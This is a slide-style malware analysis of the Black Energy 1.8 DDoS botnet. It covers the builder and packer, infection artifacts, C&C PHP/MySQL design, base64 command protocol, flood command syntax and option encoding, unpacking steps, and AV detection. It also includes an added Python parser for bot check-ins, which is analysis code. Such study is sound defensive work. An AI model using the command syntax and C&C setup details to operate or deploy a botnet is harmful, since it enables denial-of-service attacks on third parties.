- Building the backdoor
- Infection analysis
- Command and control system architecture
- Botnet communication
- Attacks analysis
- Defensive measures
- Conclusions
- Demo
3. Background
A little bit of background…
- Web-based distributed denial of service (DDoS) botnet
- Probably developed by one or more Russian hackers
- Version 1.8 seems to be the most recent
- Has been hosted in Malaysia and Russia and actively used against Russian targets
- Communication is entirely based on HTTP
- The command and control (C&C) system is based on the PHP language and a Mysql database
- Version 1.7 was sold for 40 USD in Russian hacker forums
- Version 1.8 has been downloaded from download.xakepok.org after visiting affiliate links
4. What’s in the package?
The package format…
The package comes in a rar archive (blackenergy18.rar).
Package listings – bot files:
- builder.exe builds two versions of the same backdoor (encrypted and unencrypted)
- crypt.exe is required by builder.exe to encrypt the backdoor
- cadt.dll is required by crypt.exe to encrypt the backdoor
5. What’s in the package?
The C&C files:
- db.sql is the Mysql database structure of the C&C system
- www directory contains all PHP scripts used by the C&C
  - index.php is the main C&C web interface page
  - stat.php – core HTTP communication engine of the botnet. It receives requests and sends responses
  - flags folder contains the flag icons used to identify the bot country
  - config.php is the C&C interface config file
  - common.php – common PHP functions used by the C&C components
  - cmdhelp.html – command listings and help syntax in Russian
  - Net folder contains the GeoIP.php application used to associate a bot IP to a country
6. Building the backdoor
Builder.exe creates two backdoor executables. Some interesting options:
7. Building the backdoor
Output results…
- _bot.exe is created within the same folder where builder.exe is located. _bot.exe is the decrypted backdoor version.
- crypted__bot.exe is the encrypted/packed version (according to some AV, the packer is “Stalin”).
- Both executables are fully functional.
- crypt.exe is automatically invoked by builder.exe and packs _bot.exe with Stalin. This is used to defeat AV detection and reverse engineering.
- The decrypted backdoor file size is 23040 bytes
- The encrypted/packed backdoor file size is 12871 bytes
8. Infection Analysis
Infection scenario…
The Black Energy backdoor does not exploit any vulnerability in the operating system. The victim needs to execute the malware in order to be infected. The infection is typically triggered by the victim downloading and executing the backdoor from fake online game web sites.
9. Infection Analysis – Methodology
Before proceeding to the analysis of the backdoor, let’s spend some words on the methodology.
Dynamic and static analysis:
- To properly analyse the infection, the backdoor needs to be tested in a controlled environment. In this way, it is possible to “detect” changes that affect the controlled environment.
- Dynamic analysis involves deploying multiple sensors into the environment to detect changes caused by the backdoor activity.
- Static analysis involves the use of reverse engineering tools to control the code execution of the backdoor.
It is recommended to use both methods when analysing any malware. Dynamic analysis tends to produce “false positives”, as many factors are analysed at the same time and some of them may not be related to the backdoor activity. For this reason, the analyst should always confirm the results with static analysis and vice versa.
10. Infection Analysis – Dynamic/Static Analysis
Dynamic analysis overview
Scope: analysis of the local system interaction using multiple tools. Any changes to the following components must be detected:
- Windows Registry
- File system
- Memory/processes
- Network traffic
Static analysis overview
Scope: full deep analysis of the disassembly code of the backdoor executable. A deep analysis of the PE structure and the disassembly code to understand how the backdoor interacts with the Registry, the Windows API and the Windows DLLs, what functions are called, what operations are performed and what packer is used.
11. Dynamic Analysis – Tools
The environment and the monitoring tools in the dynamic analysis:
- VMware image of WinXP with SP2 – this is the controlled environment where the infection has been analysed
- VMware image of Ubuntu running a LAMP environment to host the C&C system
- Regmon.exe – tool used to monitor any changes to the Windows Registry
- Filemon.exe – any file system activity is recorded by this tool
- Diskmon.exe – any disk activity is recorded by this tool
- SysInternals Process Explorer – like the Windows Task Manager + additional features
- Rapier (Rapid Assessment & Potential Incident Examination Report) is a framework that makes use of multiple tools to audit the entire OS
- Wireshark and tcpdump – network analyser and sniffer
12. Dynamic Analysis – Windows Registry
Tool: regmon.exe
Two Windows Registry keys have been created and one modified:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\…supdate]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\…supdate]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AFD\Parameters]
13. Dynamic Analysis – File System
Tools: Rapier with WinAudit and Chksum, filemon.exe
A new file called mssrv32.exe is created in C:\Windows\system32. File size is 12780 bytes.
Other files added with the infection: 4c380647cca89aacd29ed5f7430b2151 _BOT.EXE-160375AD.pf
Filemon.exe is used to list all file activities in the system.
14. Dynamic Analysis – File System
The following file system activities are related to the creation of mssrv32.exe:
Note that mssrv32.exe has the same size as _bot.exe.
15. Dynamic Analysis – Network/Processes
Tools: Tcpview, Rapier + Network Module + GDIProcs, WinAudit
Tcpview output: a process without a name is identified by Tcpview. It starts a TCP connection from source port 1035 to destination port 80. 192.168.0.34 is the C&C master server in this instance. The properties of the process show a connection between the botnet and svchost.exe.
16. Dynamic Analysis – Network/Processes
Rapier with Network Netstat result (192.168.1.1 is the C&C server):
Rapier with Network module result: the Rapier network module runs different scans. All the information gathered allows the PID associated with the process, the source/destination ports, the protocol and the associated executable to be identified. These results are confirmed by the GDI Procs scan analysis as well:
17. Dynamic Analysis – Network/Processes
WinAudit result: note that there is no information associated with Process Description and Process Manufacturer.
18. Static Analysis – Reversing malware
The environment and the tools in the static analysis:
- VMware image of WinXP with SP2 – this is the controlled environment where the infection has been analysed
- VMware image of Ubuntu running a LAMP environment to host the C&C system
- Ollydbg – freeware Windows debugger – this has been used with the builder.exe, crypt.exe, _bot.exe, crypted__bot.exe and cdat.dll files
- IDA Pro – commercial Windows debugger – this has been used with the _bot.exe file
- PEiD – PE analyser tool – this has been used with the builder.exe, crypt.exe, _bot.exe, crypted__bot.exe and cdat.dll files
19. Static Analysis – Reversing malware
Before analysing the disassembly code, information about the PE structure, imports and exports should be analysed. Let’s dump the basic headers and the import/export entries of the malware executable.
The export table only contains a reference to the start function, which is the OEP (Original Entry Point). Imports are mainly related to the following APIs and DLLs:
20. Static Analysis – Reversing malware
Some interesting functions imported:
21. Static Analysis – Reversing malware
Backdoor installation
When the program is first launched, it runs some checks to see whether it has already been installed, and if not it installs itself. This is done by calling GetModuleFileName to obtain the primary executable’s file name. If nothing is found, it copies itself to C:\WINDOWS\SYSTEM32\mssrv32.exe.
22. Static Analysis – Reversing malware
The backdoor cannot delete the executable while it is running. The program has to launch a new instance, terminate the first one, and delete the original file from this new instance.
The backdoor proceeds to create a mutex called {F3532CE1-0832-11B1-920A-25000A276A73}. The purpose of this mutex is to make sure no other instances of the program are already running; the program terminates if the mutex already exists. This mechanism ensures that the program doesn’t try to infect the same host twice.
23. Static Analysis – Reversing malware
During the installation, the backdoor interacts with the Windows Registry. The following is an example of registry creation to establish the backdoor as a system service that will be run at each system boot:
The following registry value is added to disable the Windows raw socket security checks (this enables the backdoor to launch network DDoS attacks):
24. Static Analysis – Reversing malware
After creating mssrv32.exe, it creates an svchost.exe process and then deletes _bot.exe.
25. Static Analysis – Reversing malware
Botnet communication
Then it starts to communicate with the server through POST requests.
26. Static Analysis – Reversing malware
Crypted__bot.exe – some words about defeating the protector used by Black Energy
Some AV identify the packer as “Stalin”, but no information is available about this packer.
Crypt.exe creates an executable file which contains the encrypted backdoor at section 13112000. At VA 131110A1 there is a call to the function 131111B9. This function includes multiple sub-functions which perform bitwise operations to decrypt the backdoor into memory. The decrypted backdoor is then copied in clear text, byte by byte, to the memory address 00320000. The size of the memory allocated for the decrypted backdoor is 6000 bytes.
The memory can then be dumped to an executable file with the OllyDump plug-in, or the OEP can be changed. A tool like ImpRec is then needed to rebuild the import/export table of the dumped file. LordPE can then be used to optimise the code.
27. Static Analysis – Reversing malware
Finding the OEP of the decrypted backdoor…
Crypted _bot.exe is stored at 13112000. Crypted_.131111b9 decrypts _bot.exe to 00320000. Note the different sizes: 6000 and 3000.
28. C&C System Architecture
The command and control system architecture requires:
- Mysql server
- Any web server supporting PHP and PHP-Mysql
The C&C is ideal for vulnerable LAMP environments.
Mysql database overview – the database is composed of three tables:
- Files – id, url, dnum, dtotal, country
- Opt – name, value
- Stat – id, build_id, files, ip, last, country, country_full
The Files table is associated with the downloader function. The URL variable contains the URL from which the backdoor can fetch and launch another executable. It is not clear how this function works. It might be used for “updating” the botnet. A cross-reference field is also present in the stat table (files).
29. C&C System Architecture
The Opt table stores the command list:
- attack_mode – a numerical value for the type of attack (default, drop by socket, drop by timeout)
- cmd – the command to send to the bot
- http_freq – how many requests per second to send in HTTP GET flood mode
- http_threads – how many program threads to create for the HTTP flood
- icmp_freq – how many ICMP packets to send in ICMP attack mode
- icmp_size – how large the ICMP packets sent in ICMP attack mode should be
- max_sessions – for ‘drop by timeout’
- spoof_ip – Boolean, used in raw packet flooding attacks
- syn_freq – how frequently to send packets during a TCP SYN flood
- tcpudp_freq – how often to send TCP or UDP traffic
- tcp_size – how large the TCP packets should be
- udp_size – how large the UDP packets should be
- ufreq – how long (in minutes) to wait before checking for another command
30. C&C System Architecture
This is the opt table after a ‘flood http localhost’ command was sent to the bot:
31. C&C System Architecture
The Stat table contains all the statistics of the botnet:
- ID is built from the system’s SMB hostname and the System Volume ID of the C: drive of the infected machine
- build_id is the string value set by builder.exe (can be changed at building time)
- Files is a reference to the files table
- Last is a time value in the format of time() and measures the bot heartbeat
- Country and country_full are used by the web interface to display the country flag of the bot
32. C&C System Architecture
C&C system web interface (index.php). From here, commands can be sent and statistics can be accessed.
33. C&C System Architecture
Sending the commands to the zombie…
The command entered through the web interface (index.php) is saved into the database (table opt). The bot performs regular POST requests to http://c&cserver/stat.php, or whatever URL value was set at building time. These requests are performed in order to receive commands from the master server. If the zombie is not able to connect to the master server, it automatically executes the command specified at building time (by default -> wait). Wait sets a counter after which the zombie retries connecting to the master server.
34. C&C System Architecture
stat.php is responsible for retrieving commands from the database and then outputting them in base64 format.
35. C&C System Architecture
Commands available:
- Refresh Rate – change the refresh rate
- Flood – network DDoS attacks
  - icmp – a basic ICMP ping flood
  - syn – a basic TCP SYN flood
  - udp – a basic UDP traffic flood
  - http – an HTTP GET request flooder
  - data – a basic binary packet flooder
  - dns – a DNS request flooder
- Wait – the bot process is put to sleep for x seconds and then re-performs the POST request to receive new commands
- Stop – stop any attack currently running
- Die – this deletes the backdoor on the infected machine
36. C&C System Architecture
Command syntax:
flood http 192.168.1.1 index.htm
flood icmp 192.168.2.2 index.php
flood syn 192.168.3.2
Multiple commands can be specified using semicolons: dns; icmp; http; syn; 192.168.1.1#15#xHOST
Normally, the DDoS options are passed in the command syntax as well: '10;2000;10;0;0;30;100;3;20;1000;2000#wait#10#xHOST’
In order: ICMP frequency, ICMP packet size, SYN frequency, spoof IP or not (Boolean value), the attack mode, the maximum number of HTTP sessions, the HTTP connection frequency, the number of HTTP threads, the TCP and UDP frequency, the UDP size, the TCP packet size and the bot id.
37. Botnet Communication
Botnet communication from a network perspective. Tools: tcpdump and wireshark.
HTTP POST request from the bot: note that the bot id and build_id are passed in the POST request. These are needed by the master to identify the bot.
HTTP response from the master server: Command -> 10;2000;10;0;0;30;100;3;20;1000;2000#stop#1#
38. DDoS Attacks Overview
DDoS attacks with the flood command – overview
- Flood udp – this attack involves sending malformed UDP packets. Source and destination ports are random.
- Flood icmp – this attack sends ICMP requests to the target with a payload of 1480 bytes (this value can be changed arbitrarily).
39. DDoS Attacks Overview
- Flood http – this involves GET requests to the URL specified in the command syntax.
- Flood data – this sends malformed UDP packets with an invalid length. The payload size varies for each packet and random data is appended to the payload. Source and destination ports are random for each packet.
40. Defenses and Countermeasures
AV detection – both _bot.exe and crypted__bot.exe have been analysed. Some AV still fail to identify the Black Energy backdoor. Some AV identify the backdoor as a downloader instead. The service that has been used is provided by virustotal.com.
_bot.exe results available here: http://www.virustotal.com/analisis/c88ba95b30d2fe50bc612ab73b922fc2
Crypted_bot.exe results available here: http://www.virustotal.com/analisis/12cc7b4378f7ce90963232423590068b
43. Defenses and Countermeasures
Backdoor variants: three different backdoor variants have been identified. The variants differ in the POST data sent to the C&C master server.
- First variant: uses a simple two-part data string to communicate with the web server, presenting the bot host ID and the build ID using two different variables.
- Second variant: uses only one variable, ‘data’, to submit this information, and separates these two values with a colon (‘:’).
- Third variant: the same values (bot ID and build_ID) + SOCKS/HTTP proxy address.
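Reading the check-in exchange the slides describe, as an added example that is not part of the original presentation or of the botnet package: it decodes the base64 command line that stat.php returns (slides 34, 36 and 37) into the opt table field names, and classifies the three POST body variants of slide 43. The POST field names 'id' and 'build_id' for the first variant and the colon-appended proxy layout for the third are assumptions, and all sample values are constructed.

```python
"""Decode a Black Energy 1.8 bot check-in and master reply (analyst-side parser).

Added example, not code from the presentation or from the botnet package.
Assumptions not stated on the slides: the first POST variant names its two
fields 'id' and 'build_id' (the stat table column names), and the third
variant appends the proxy address as a third colon-separated part of 'data'.
"""
import base64
from urllib.parse import parse_qs

# Numeric option block, in the order slide 36 gives it. The eleven values
# precede the first '#'; the bot id follows the last '#'.
OPTION_FIELDS = (
    "icmp_freq", "icmp_size", "syn_freq", "spoof_ip", "attack_mode",
    "max_sessions", "http_freq", "http_threads", "tcpudp_freq",
    "udp_size", "tcp_size",
)

# Constructed from the response shown on slide 37 (command 'stop', argument 1,
# empty bot id), base64-encoded the way stat.php emits it.
SAMPLE_COMMAND = "10;2000;10;0;0;30;100;3;20;1000;2000#stop#1#"
SAMPLE_RESPONSE = base64.b64encode(SAMPLE_COMMAND.encode("ascii")).decode("ascii")


def parse_options(block: str) -> dict:
    """Map the semicolon-separated numeric values onto the opt table names."""
    values = block.split(";")
    if len(values) != len(OPTION_FIELDS):
        raise ValueError(f"expected {len(OPTION_FIELDS)} option values, got {len(values)}")
    options = {name: int(value) for name, value in zip(OPTION_FIELDS, values)}
    options["spoof_ip"] = bool(options["spoof_ip"])  # slide 36: Boolean flag
    return options


def parse_command_line(line: str) -> dict:
    """Parse '<options>#<command>#<argument>#<bot id>' (slides 36 and 37).

    The multi-command form 'dns; icmp; http; syn; target#15#xHOST' from
    slide 36 has a different shape and is not handled here.
    """
    parts = line.split("#")
    if len(parts) != 4:
        raise ValueError("command line must have four '#'-separated parts")
    options, command, argument, bot_id = parts
    words = command.split()
    result = {
        "options": parse_options(options),
        "command": words[0] if words else "",
        "argument": argument,
        "bot_id": bot_id,
    }
    if result["command"] == "flood":
        # 'flood <type> <target> [<path>]' is the syntax slide 36 shows for the
        # web interface; whether the bot sees the leading keyword is not shown.
        if len(words) < 3:
            raise ValueError("flood needs an attack type and a target")
        result["flood"] = {
            "type": words[1],
            "target": words[2],
            "path": words[3] if len(words) > 3 else None,
        }
    return result


def decode_master_response(body: str) -> dict:
    """stat.php outputs the command in base64 (slide 34); decode and parse it."""
    raw = base64.b64decode(body, validate=True).decode("ascii")
    return parse_command_line(raw.strip())


def parse_bot_checkin(post_body: str) -> dict:
    """Classify a bot POST body into one of the three variants of slide 43."""
    fields = parse_qs(post_body, keep_blank_values=True)
    if "data" in fields:
        # Variant 2: 'data=<id>:<build_id>'. Variant 3 (assumed layout): a third
        # part carrying the SOCKS/HTTP proxy address, which may itself contain
        # ':' (host:port), so only the first two separators are split.
        pieces = fields["data"][0].split(":", 2)
        if len(pieces) == 2:
            return {"variant": 2, "id": pieces[0], "build_id": pieces[1]}
        if len(pieces) == 3:
            return {"variant": 3, "id": pieces[0], "build_id": pieces[1], "proxy": pieces[2]}
        raise ValueError("'data' field is not in id:build_id form")
    if "id" in fields and "build_id" in fields:
        # Variant 1 (field names assumed from the stat table columns).
        return {"variant": 1, "id": fields["id"][0], "build_id": fields["build_id"][0]}
    raise ValueError("unrecognised check-in body")


if __name__ == "__main__":
    # Constructed sample values, not captured traffic.
    print(parse_bot_checkin("id=HOST_1234ABCD&build_id=test"))
    print(decode_master_response(SAMPLE_RESPONSE))
```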
44. Conclusions
- The Black Energy botnet package is not difficult to obtain
- The C&C system is trivial to install and can easily be installed in any compromised LAMP environment
- The C&C system is easy to use and manage (script-kiddie style)
- Some AV still do not detect the Black Energy backdoor, although it has been around since mid 2007
- Black Energy version 1.7 was released in summer 2007. Version 1.8 was released in November. Probably a new version will come out soon
- The main differences between version 1.7 and version 1.8 are the web interface and the downloader feature
- It is unclear today what the next variants or versions of the Black Energy botnet package could be. The information currently available suggests that the next Black Energy botnet version will be easier to use and will include additional features
45. Demo
Time for a demo! Demo in VMware environments, only 2 hosts:
- C&C master server – Ubuntu 6.10 + LAMP – 192.168.1.1
- Bot machine: WinXP with SP2 – 192.168.1.2